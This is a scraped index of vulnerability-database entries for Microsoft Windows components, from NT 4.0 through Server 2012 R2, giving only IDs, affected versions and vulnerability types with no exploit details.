10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error [53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] 